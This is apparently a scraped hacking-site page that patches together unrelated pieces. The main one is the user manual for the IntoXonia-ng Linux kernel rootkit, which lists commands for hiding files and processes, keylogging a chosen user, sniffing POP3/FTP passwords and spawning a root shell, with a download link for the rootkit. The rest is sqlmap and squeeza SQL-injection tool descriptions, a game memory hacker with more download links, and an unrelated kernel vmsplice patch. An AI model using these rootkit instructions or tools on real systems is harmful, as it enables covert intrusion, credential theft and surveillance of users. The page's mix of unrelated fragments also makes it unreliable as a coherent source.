Linux Lkm Rootkit for 2.6.x Kernels

IntoXonia - LKM rootkit for Linux Kernel 2.6.x
==============================================

1. History
———-

I have released first version of IntoXonia in 2005. There were different replies.
Rootkit was incompatible with 64-bit architecture because algorythm of searching the system
call table address didn’t work fine Also I’ve found a bug in getting full path to file.
In this version I have fixed known bugs and added new features (look ChangeLog). Method of
rootkit configuration IMHO changed in a best way. It is realised by fake binary file
but all the options are cathegorized.
Today, 05/28/2006 - is date of release of IntoXonia-ng LKM rootkit.

2. Possibilities
—————-

(*) hiding files & directories
(*) hiding processes
(*) fake removing files
(*) redirect opening of files
(*) redirect directory changing
(*) prohibition of opening files
(*) prohibition of directory changing
(*) adding fake line to the file
(*) hiding line in file
(*) replacing lines in file while reading
(*) protecting file of removing
(*) safe saving file before removing
(*) protecting processes
(*) making aliases for commands
(*) redirect of execution binary files
(*) prohibition of program execution
(*) registrating pressed keys (keylogger)
(*) sniffing POP3/FTP passwords
(*) loading/saving options to a file
(*) obtaining root privileges
(*) manual changing UID/GID of process
(*) secure file erasing
(*) configuring with the use of fake binary
(*) protecting configuration with a password
(*) promisc mode hiding

3. Installation
—————

I haven’t made a configurator yet, so you have to configure rootkit manually Three constants
are stored in file option.h. CONTROL constant contains path to fake binary which is needed for
configuring. PASSWORD constant contains authorisation password. After you have edited them, you
can compile and insert module:

# make
# make load

4. Configuration
————————–

Now all commands are unified As before, configuration is made with the use of fake
binary, by default it is /control. For configuring you have to authorize:

# /control auth

All command have the same syntax:

# /control <+|->

First parameter is a type of option. There are 6 types of commands: fs, task, prog, log, sniff, inet.
Next comes + or - depending on action - adding or removing a rule. Parameter “command” stands
for certain option and has it’s own specific arguments args.
Example: you can add redirect rule by following command:

# /control fs +link /etc/passwd /etc/passwd.old

You can remove this rule by changing just one symbol:

# /control fs -link /etc/passwd /etc/passwd.old

Apart from main configuration rules a few other commands exist. They would be
mentioned later. Use “close” for closing configuration session:

# /control close

5. File access options
———————-

All commands for file access options begin with /control fs.

Command: /control fs +hide /file
Description: This command removes /file from directory contents.
Note: Correct work of ls /file is not a mistake because if you
correctly enter the full name of the file, then you
know that it is there.

Command: /control fs +remove /file
Description: This command makes fake file removing.
Note : Use this option if you want to avoid any reference to the file.

Command: /control fs +link /file1 /file2
Description: Redirecting to /file2 when opening /file1.
Note: to delete a rule you need to type all parameters that were
typed when adding. Example:
/control fs -link /file1 /file2

Command: /control fs +link /dir1 /dir2
Description: Redirecting to directory /dir2 when changing to directory /dir1.
Note: both directories must be typed without trailing ‘/’.

Command: /control fs +deny /file
Description: Deny any access to /file.

Command: /control fs +line /file text task
Description: Adding fake text ‘text’ to the end of /file which
can be read by program ‘task’.

Command: /control fs +hline /file text
Description: Hiding all lines containing ‘text’ in /file.

Command: /control fs +repl /file str1 str2
Description: On-the-fly replacing str1 by str2 in /file when reading.

Command: /control fs +protect /file
Description: Protecting /file from removing.

Command: /control fs +save /file /dir/
Description: Automatic saving /file in directory /dir/ when removing.
Note: you have to type ‘/’ at the end of path to directory here

6. Options connected with processes
———————————–

There is possibility hiding and protecting of processes in this rootkit. You can hide process
with the following command:

# /control task +hide pid

Protecting means prohibition of sending signals to processes:

# /control task +protect pid

7. Options connected with executing binaries
——————————————–

All commands connected with executing binaries begin with /control prog.
You can make alias for binary with the following command:

# /control prog +make /fake /command

Now /fake will be interpreted as well as /command.
Aliases are made for executing hidden or forbidden binaries.
There is also redirecting for programs:

# /control prog +link /prog1 /prog2

Now program /prog2 will be executing instead of /prog1.
Prohibition of executing binaries is made with ‘deny’ option:

# /control prog +deny /prog

This command will deny execution of /prog.

8. Keylogger configuration
————————–

Keylogger is configured by the following command:

# /control log + uid /file

Argument uid conform to the user identificator, whose keyboard
actions will be logged to /file.

9. Sniffer configuration
————————

This rootkit contains sniffer of POP3 and FTP passwords. To view all POP3 and FTP passwords
and usernames, type the following commands:

# /control sniff +pop
# /control sniff +ftp

Filtered usernames and passwords are printed with printk(), so you can
view them with dmesg program.

10. Network configuration
————————-
# /control inet +promisc

Hide PROMISC interface mode. Use it to hide working external sniffer
program.

11. Saving and loading options
——————————

All rules for files, processes, binaries, keylogger and sniffer may be saved to file,
and loaded when you start rootkit next time. There are two commands for it:

# /control save /file
# /control load /file

11. Functions of immediate execution
————————————

There are several commands in this cathegory: obtaining root privileges, manual
changing UID/GID of process and secure files erasing. To get root privileges, type:

# /control rootme

The result is execution /bin/sh with root privileges.
To change UID/GID of process with PID identificator manually type following commands:

# /control setuid pid uid
# /control setgid pid uid

Secure file erase can be done by following command:

# /control erase /file

All these functions won’t work without authorization

12. Disadvantages
—————–

IMHO, haquer has noticed that rootkit doesn’t contain traditional possibility of hiding
netstat contents. It is realized by hiding certain lines in /proc/net/tcp and /proc/net/udp
so IMHO it is not a disadvantage But unfortunately there are some others. Firstly,
rootkit is not compatible with 64-bit architecture. Secondly, all options are stored
in kernel space, where memory is not swapped. Although rootkit works fine on most 2.6
kernels, system call table cannot be found on new ones. Some kernels make Oops after
module unloading. It is not critical - it happens because of read() system call
intercepting. Also, I don’t know whether rootkit is compatible with X.

13. Disclaimer
————–

This module is designed to show possibilities of intercepting system calls in OS Linux.
I don’t guarantee that it’ll work without bugs. Author has no responsibility for using
this program in improper ways.

14. Greetingz
————-

WildCat - translation
EH0T, Vishnyaaa - translation
Roneon - moral support, ideas
Elena Arishina - moral support
DarkEagle - introducing me to scene
Dpoke Wizard - first user
Victor Makarov - hacking, testing
ShadOS - hacking, testing
Kolya aka prox - testing
Oberon - testing
DJ KolbasoID - cool trance
DJ Tiesto - cool trance also
THC - information
OpenNet.ru - information
Linux.Org.Ru - information (+ help on forum)
SecurityLab.ru - information (+ thanx for prize on competition :))
Vitaly Zaicev - hosting

And great thanx to my beloved girl Lika for the thing she exists
And thanx to you, c001_H4ck3r, that you’ve read this trash up to the end

You can communicate with me using e-mail: xdiman [at] mail [dot] ru

Project home site: http://satanic.easycoding.org

28-05-2006 5:28
_4epen aka Self Assured Addict %)

+++++++++++++++++++++++++++++++++++
From ShadOS

Download From Here ->> http://backdoored.net/intoxonia-ng2[1].tar.gz

Introduction
sqlmap is an automatic SQL injection tool entirely developed in Python. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

Features
Here is a list of major features implemented in sqlmap:

Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
Extensive database management system back-end fingerprint based upon:
Inband DBMS error messages
DBMS banner parsing
DBMS functions output comparison
DBMS specific features such as MySQL comment injection
Passive SQL injection fuzzing
It fully supports two SQL injection techniques:
Blind SQL injection, also known as Inference SQL injection
Inband SQL injection, also known as UNION query SQL injection
and it partially supports error based SQL injection as one of the vectors for database management system fingerprint;
It automatically tests all provided GET, POST, Cookie and User-Agent parameters to find dynamic ones. On these it automatically tests and detects the ones affected by SQL injection. Moreover each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three type with one and two brackets to find which is the valid syntax to perform further injections with;
It is possible to provide the name of the only parameter(s) that you want to perform tests and use for injection on, being them GET, POST, Cookie parameters;
SQL injection testing and detection does not depend upon the web application database management system back-end. SQL injection exploiting and query syntax obviously depend upon the web application database management system back-end;
It recognizes valid queries by false ones based upon HTML output page hashes comparison by default, but it is also possible to choose to perform such test based upon string matching;
HTTP requests can be performed in both HTTP method GET and POST (default: GET);
It is possible to perform HTTP requests using a HTTP User-Agent header string randomly selected from a text file;
It is possible to provide a HTTP Cookie header string, useful when the web application requires authentication based upon cookies and you have such data;
It is possible to provide an anonymous HTTP proxy address and port to pass by the HTTP requests to the target URL;
It is possible to provide the remote DBMS back-end if you already know it making sqlmap save some time to fingerprint it;
It supports various command line options to get database management system banner, current DBMS user, current DBMS database, enumerate users, users password hashes, databases, tables, columns, dump tables entries, dump the entire DBMS, retrieve an arbitrary file content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated;
It is possible to make sqlmap automatically detect if the affected parameter is also affected by an UNION query SQL injection and, in such case, to use it to exploit the vulnerability;
It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS databases tables entries and you want to skip the default DBMS data;
It is possible to view the Estimated time of arrival for each query output, updated in real time while performing the SQL injection attack;
Support to increase the verbosity level of output messages;
It is possible to save queries performed and their retrieved value in real time on an output text file and continue the injection resuming from such file in a second time;
PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR (or similar) DBMS specific function.

u can download it from here http://sqlmap.sourceforge.net/#download

MHS is a utility for searching, viewing, and modifying the RAM of other processes, and for disassembling and debugging other processes.

MHS sports the fastest and most efficient searches available, an advanced, colorful, and easy-to-use real-time Hex Editor, a Debugger with unique features, a Disassembler, and an extensive scripting language (L. Spiro Script) yielding unlimited potential.

The array of tools offered in MHS can make hacking any game easy.

Here is a compact list of tools and features:

Searching
Data-Type Searches
Fastest searches available.
Search for types char, byte, short, unsigned short, int, long, unsigned long, 64-bit integer, float, and double.
Search for exact values, values not equal to, ranges, greater than, less than, and unknown.
Group Searches
Find unordered sets of data.
Find relative lists of data.
String Searches
Find hex strings, ASCII strings, Unicode strings, Wildcard strings, and Regular-Expression strings.
Boyer Moore Algorithm for fast searching.
Pointer Searches
Fastest search possible.
Quickly find both static and dynamic pointers.
Script Searches
The most powerful searches possible.
You have full control over what values are found during a search.
Able to replicate all search types available in all software, now and forever.
All addresses shown after a search and without delay; no need to view “only the first 100” returns.
Converter
Convert from any type to any other type, both big and little endian.
RAM Watcher
View the RAM of the target process in real-time.
Multiple display types shown simultaneously.
Real-Time Expression Evaluator
Evaluates even the most complex of expressions.
Shows expression results in real-time; especially useful for following changing pointer locations or changing expressions.
Hex Editor
Edit files and RAM.
Files open instantly, regardless of size, and RAM is shown in real-time.
Multiple display types show you RAM and files in characters, bytes, shorts, ints, floats, doubles, and more.
Full undo/redo.
Many options and full customization.
Debugger
Breakpoint functionality can be assigned by the user, and breakpoints can call user-defined script functions for the ultimate do-what-you-want.
Hardware breakpoints.
Read/write software breakpoints (watchpoints).
The Debugger issues debugging events that can be handled by scripts, allowing the user to perform any and all operations he or she desires at key times during debugging.
Disassembler
Shows names of known functions.
Logging (to be finished).
Addresses of all imported/exported functions shown.
Auto-Hack shows you every read, write, or access to an address, and extremely advanced features will be coming soon (automatic back-tracking down to the root pointer).
Exlanations of ASM instructions are provided in real-time, explaining what each instruction is going to do and offering previews of the results.
Process threads are updated in real-time and useful information about them is displayed.
Injection Manager
Complete and feature-rich injection suite.
Code caves can be found automatically, defined by the user, or created.
Code preview shows you the code before injecting.
Automatically adds the JMP back to the original code and adds the overwritten code to the code cave.
Injections are automatically saved, and options allow to inject automatically when the process is reloaded later.
Automatic injections are always safe; injections are verified before being automatically injected.
Script Editor
Syntax coloring.
Code folding.
Functions listed and easily navigated.
Hotkeys
Many assignable keys and functions.
Two hotkey implementations in case the game blocks one or the other.
Stability
MHS is extremely stable. Currently there are no known issues.
But the biggest feature in MHS is that it is constantly updated.
http://backdoored.net/MHS4.016_NoAAC.rar

Can I get an introduction?

Sure. squeeza was released as part of SensePost’s BlackHat USA 2007 talk on timing and related attacks
What Does squeeza Do?

squeeza is a tool that helps exploit SQL injection vulnerabilities in broken web applications. Its functionality is split into creating data on the database (by executing commands, copying in files, issuing new SQL queries) and extracting that data through various channels (dns, timing, http error messages)

Currently, it supports the following databases:

Microsoft SQL Server
squeeza is *not* a tool for *finding* injection points. That recipe generally starts with 1 x analyst.

License
squeeza is distributed under the GNU General Public License.

Download Link : http://backdoored.net/squeeza-0.21.tar.gz

— a/fs/splice.c
+++ b/fs/splice.c
@@ -1179,6 +1179,9 @@ static int copy_from_user_mmap_sem(void *dst, const void __user *src, size_t n)
{
int partial;

+ if (!access_ok(VERIFY_READ, src, n))
+ return -EFAULT;
+
pagefault_disable();
partial = __copy_from_user_inatomic(dst, src, n);
pagefault_enable();
@@ -1387,6 +1390,11 @@ static long vmsplice_to_user(struct file *file, const struct iovec __user *iov,
break;
}

+ if (unlikely(!access_ok(VERIFY_WRITE, base, len))) {
+ error = -EFAULT;
+ break;
+ }
+
sd.len = 0;
sd.total_len = len;
sd.flags = flags;